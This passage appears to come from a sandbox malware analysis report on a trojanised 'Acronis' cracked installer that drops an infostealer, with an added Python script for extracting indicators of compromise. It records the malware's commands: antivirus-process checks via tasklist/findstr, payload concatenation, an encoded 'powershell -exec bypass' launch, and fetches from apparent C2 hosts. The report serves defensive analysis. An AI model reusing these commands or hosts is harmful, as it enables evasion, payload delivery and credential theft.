                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: RegisterRawInputDevicesmemstr_2b484035-5
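The URL strings and TLS connections above are the raw material for an IOC list, but they need cleaning before use: the same host appears with and without an explicit :443, the paths carry trailing bytes from adjacent memory (`/api)5`, `/apitxtPK`, `Panorado.exean.txt`), and most of the URLs come from scraped browser profiles, PowerShell/.NET, Inno Setup or code-signing certificates rather than from the stealer. The following Python helper is an added example, not part of the Joe Sandbox report or its tooling. It assumes the two fused report columns have been separated with " | " (the sample rows are copied from this section with the memory-region identifiers shortened), and it uses an analyst-maintained allowlist of known-benign host suffixes, which is an assumption of this example rather than anything the sandbox emits.

```python
import re
from collections import defaultdict

# Constructed sample: rows copied from the report section above, with the long
# memory-region identifiers shortened and the fused columns separated by " | ".
SAMPLE_LINES = [
    "Source: Palestine.com, 00000011.00000002.2039631031.sdmp | String found in binary or memory: https://kliplorihoe0.shop/",
    "Source: Palestine.com, 0000001F.00000002.2370163430.sdmp | String found in binary or memory: https://kliplorihoe0.shop:443/int_clp_ldr_pan.txt1",
    "Source: powershell.exe, 00000021.00000002.2261102876.sdmp | String found in binary or memory: https://kliptedehoa.shop/int_clp_pan.txt",
    "Source: Palestine.com, 00000011.00000002.2040719422.sdmp | String found in binary or memory: https://shearhoaxx.click/api)5",
    "Source: Palestine.com, 0000001F.00000002.2370163430.sdmp | String found in binary or memory: https://shearhoaxx.click:443/apitxtPK",
    "Source: Palestine.com, 00000011.00000002.2023662646.sdmp | String found in binary or memory: https://slotwang.com:443/file/Panorado.exean.txt",
    "Source: powershell.exe, 00000021.00000002.2333308097.sdmp | String found in binary or memory: https://contoso.com/License",
    "Source: Palestine.com, 00000011.00000003.1563852237.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20",
    "Source: unknown | HTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49701 version: TLS 1.2",
    "Source: unknown | HTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49708 version: TLS 1.2",
    "Source: unknown | HTTPS traffic detected: 45.66.248.134:443 -> 192.168.2.16:49710 version: TLS 1.2",
]

# Hosts that show up only because the stealer reads browser profiles and because
# PowerShell/.NET, Inno Setup and code-signing certificates leave their own URLs in
# memory. This allowlist is an analyst-maintained assumption, not sandbox output.
BENIGN_HOST_SUFFIXES = (
    "contoso.com", "amazon.com", "mozilla.org", "mozilla.com", "google.com",
    "duckduckgo.com", "yahoo.com", "ecosia.org", "microsoft.com", "msn.com",
    "passport.com", "hotmail.com", "digicert.com", "globalsign.com", "entrust.net",
    "certum.pl", "securetrust.com", "trustwave.com", "github.com", "nuget.org",
    "innosetup.com", "jrsoftware.org", "remobjects.com", "autoitscript.com",
    "openssl.org", "t-mobile.com",
)

# Host, optional port, and a path that stops at the first byte that cannot be part
# of a URL; alphanumeric junk glued to the path (e.g. "txtPK") is kept as-is.
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)(?::(\d+))?(/[A-Za-z0-9._~%/?=&+-]*)?")
TLS_RE = re.compile(r"HTTPS traffic detected: (\d+(?:\.\d+){3}):(\d+) -> (\d+(?:\.\d+){3}):(\d+)")


def is_benign(host: str) -> bool:
    """True if the host is, or is a subdomain of, an allowlisted benign domain."""
    host = host.lower()
    return any(host == s or host.endswith("." + s) for s in BENIGN_HOST_SUFFIXES)


def extract_iocs(lines):
    """Group non-benign URL strings by host (an explicit :443 is folded into the
    https default) and TLS connections by server IP.
    Returns (hosts, tls) where hosts maps host -> {"processes", "paths"} and
    tls maps server IP -> sorted list of client ports seen connecting to it."""
    hosts = defaultdict(lambda: {"processes": set(), "paths": set()})
    tls = defaultdict(list)
    for line in lines:
        source, _, detection = line.partition(" | ")
        # "Source: Palestine.com, 00000011...." -> "Palestine.com"
        process = source.split("Source: ", 1)[-1].split(",")[0].strip()
        m = URL_RE.search(detection)
        if m:
            host, port, path = m.group(1).lower(), m.group(2), m.group(3) or "/"
            if is_benign(host):
                continue
            key = host if port in (None, "443") else f"{host}:{port}"
            hosts[key]["processes"].add(process)
            hosts[key]["paths"].add(path)
            continue
        m = TLS_RE.search(detection)
        if m:
            tls[m.group(1)].append(int(m.group(4)))
    return dict(hosts), {ip: sorted(ports) for ip, ports in tls.items()}


if __name__ == "__main__":
    found_hosts, found_tls = extract_iocs(SAMPLE_LINES)
    for host, info in sorted(found_hosts.items()):
        print(host, sorted(info["processes"]), sorted(info["paths"]))
    for ip, ports in sorted(found_tls.items()):
        print(ip, "client ports", ports)
```

The host is the unit worth sharing: paths such as `/apitxtPK` or `/int_clp_ldr_pan.txt1` are memory overruns and should be read as `/api` and `/int_clp_ldr_pan.txt`. The report lists hostnames and TLS server IPs in separate rows, so mapping the four hosts to the four server IPs above still requires the DNS or PCAP data from the rest of the report.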

                System Summary

                Source: amsi32_4540.amsi.csv, type: OTHER | Matched rule: Detects obfuscated PowerShell Code Author: Florian Roth
                Source: Process Memory Space: powershell.exe PID: 4540, type: MEMORYSTR | Matched rule: Detects obfuscated PowerShell Code Author: Florian Roth
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.Data.Entity.Design.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\CN.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\mc_dec_aac.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\tipskins.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\contactsUX.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\CloudStorageService.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.SharePoint.BusinessData.Administration.Client.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msncore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msvcr80.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.NET.Build.Extensions.Tasks.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\NuGet.Build.Tasks.Pack.resources.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\System.ServiceModel.Web.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\WinPixSysMonController.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.VisualStudio.Text.Logic.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\7za.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\clrjit.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\bass.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msidcrl40.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.Developer.IdentityService.GitHubProvider.UI.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\FSharp.Core.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.Build.Tasks.CodeAnalysis.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe | File created: C:\Windows\ImposedDriven
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe | File created: C:\Windows\ConstMarkets
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe | File created: C:\Windows\EbonyFares
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe | File created: C:\Windows\DimensionFull
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe | File created: C:\Windows\PercentageTrademark
                Source: Microsoft.Developer.IdentityService.GitHubProvider.UI.dll.33.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: V2DDYDPIWYUTCJYUB0IV5.exe.31.dr | Static PE information: Number of sections : 11 > 10
                Source: 5RLYIRN4B2NNKHJ11UTSZ2.exe.17.dr | Static PE information: Number of sections : 11 > 10
                Source: Microsoft.Build.Tasks.CodeAnalysis.dll.33.dr | Static PE information: No import functions for PE file found
                Source: Microsoft.NET.Build.Extensions.Tasks.dll.33.dr | Static PE information: No import functions for PE file found
                Source: acronis recovery expert deluxe 1.0.0.132.rarl.exe, 00000001.00000003.1257893310.0000000000752000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs acronis recovery expert deluxe 1.0.0.132.rarl.exe
                Source: acronis recovery expert deluxe 1.0.0.132.rarl.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | Process created: Commandline size = 10037
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | Process created: Commandline size = 10037
                Source: amsi32_4540.amsi.csv, type: OTHER | Matched rule: SUSP_Obfuscted_PowerShell_Code date = 2018-12-13, author = Florian Roth, description = Detects obfuscated PowerShell Code, reference = https://twitter.com/silv0123/status/1073072691584880640
                Source: Process Memory Space: powershell.exe PID: 4540, type: MEMORYSTR | Matched rule: SUSP_Obfuscted_PowerShell_Code date = 2018-12-13, author = Florian Roth, description = Detects obfuscated PowerShell Code, reference = https://twitter.com/silv0123/status/1073072691584880640
                Source: Microsoft.NET.Build.Extensions.Tasks.dll.33.dr, ResolvePackageFileConflicts.cs | Task registration methods: 'CreateConflictTaskItem', 'CreateConflictTaskItems'
                Source: Microsoft.Build.Tasks.CodeAnalysis.dll.33.dr, NamedPipeUtil.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: Microsoft.Build.Tasks.CodeAnalysis.dll.33.dr, NamedPipeUtil.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: Microsoft.Build.Tasks.CodeAnalysis.dll.33.dr, BuildServerConnection.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: Microsoft.Build.Tasks.CodeAnalysis.dll.33.dr, BuildServerConnection.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@108/207@6/4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6420:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1608:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4136:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6296:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4824:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2816:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1092:120:WilError_03
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe | File created: C:\Users\user\AppData\Local\Temp\nsz1F87.tmp
                Source: acronis recovery expert deluxe 1.0.0.132.rarl.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: acronis recovery expert deluxe 1.0.0.132.rarl.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.72%
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeFile read: C:\Users\desktop.ini
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT name FROM sqlite_master WHERE type='table';
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                Source: Palestine.com, 00000011.00000003.1538557719.0000000004863000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1515637752.0000000004865000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1538874374.00000000047A2000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1515922570.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1883447128.0000000004460000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1883447128.0000000004453000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1861429624.0000000004319000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeFile read: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                Source: unknownProcess created: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe "C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe"
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Kill Kill.cmd & Kill.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 650429
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "GERMANY" False
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Murray + ..\Indication + ..\Institution + ..\Metres + ..\Display + ..\Cr + ..\Programming D
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\650429\Palestine.com Palestine.com D
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                Source: unknownProcess created: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe "C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe"
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Kill Kill.cmd & Kill.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 650429
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Murray + ..\Indication + ..\Institution + ..\Metres + ..\Display + ..\Cr + ..\Programming D
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\650429\Palestine.com Palestine.com D
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -ENc 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
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess created: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe "C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe "C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe"
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exeProcess created: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp "C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp" /SL5="$50362,17641136,845824,C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe "C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe" /VERYSILENT
